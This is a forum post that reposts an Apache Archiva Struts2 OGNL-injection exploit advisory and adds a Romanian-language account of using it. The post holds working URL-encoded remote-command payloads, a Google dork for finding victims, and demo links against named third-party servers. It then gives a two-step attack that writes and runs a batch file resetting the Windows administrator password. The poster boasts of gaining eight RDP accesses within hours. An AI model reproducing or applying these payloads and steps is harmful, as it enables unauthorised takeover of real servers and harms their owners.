Maximus Posted February 5, 2014 Report Posted February 5, 2014 Apache Archiva 1.3.6 => Remote Command Execution####################################################################Author: KacperContact: info[at]devilteam.plHome Page: https://devilteam.pl/####################################################################Vendor: Archiva - The Build Artifact Repository ManagerDork: "Apache Archiva \ Browse Repository"Description:Apache Archiva use Apache Struts2: "In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code."In Apache Archiva can be use parameter redirect: for OGNL injection.PoC:(print devilteam.pl) http://imageshack.com/a/img163/6865/e88n.pnghttp://127.0.0.1:8080/archiva/security/login.action?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27devilteam.pl%27%29,%23w.flush%28%29,%23w.close%28%29}{execute netstat) http://imageshack.com/a/img843/1662/0r84.pnghttp://127.0.0.1:8080/archiva/security/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27netstat%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}Demo:http://archiva.eionet.eurXpa.eu/security/login.action?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27devilteam.pl%27%29,%23w.flush%28%29,%23w.close%28%29}http://community.ucs.indiXna.edu:9090/archiva/security/login.action?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27devilteam.pl%27%29,%23w.flush%28%29,%23w.close%28%29}Cheers:cxsecurity.comBartek (ZUOO)and all people from devilteam.plReference:S2-016https://devilteam.pl/viewtopic.php?p=43506Daca tot am postat asta, uite ce-am incercat pana acum si-a merspas 1/archiva/security/login.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cmd','/C','echo','net','user','administrator','rstcenter!','>_.bat'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}pas 2/archiva/security/login.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cmd','/C','_.bat'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}inca nu am automatizat procesul dar se face asa ;se cauta pe google "Apache Archiva login page"ex. link vuln. : Apache Archiva \ Login Pagese adauga in ordine pasu 1 si pasu 2 de mai susex :pas1http://maven.5amsolutions.com/archiva/security/login.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cmd','/C','echo','net','user','administrator','rstcenter!','>_.bat'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}pas2http://maven.5amsolutions.com/archiva/security/login.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cmd','/C','_.bat'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}explicatie: (pas1) se creaza fisierul _.bat care contine "net user administrator rstcenter!" in serverul care hosteaza apache archiva ; pas2 se executa fisierul _.batla ora 12:00 (nu chiar 00) am descoperit exploitu ; la 2:56 am deja 8 RDP-uri (bunute) sporP.S. va trebui sa va chinuiti putin, nu o ia din prima ; nu stiu de ce.... Quote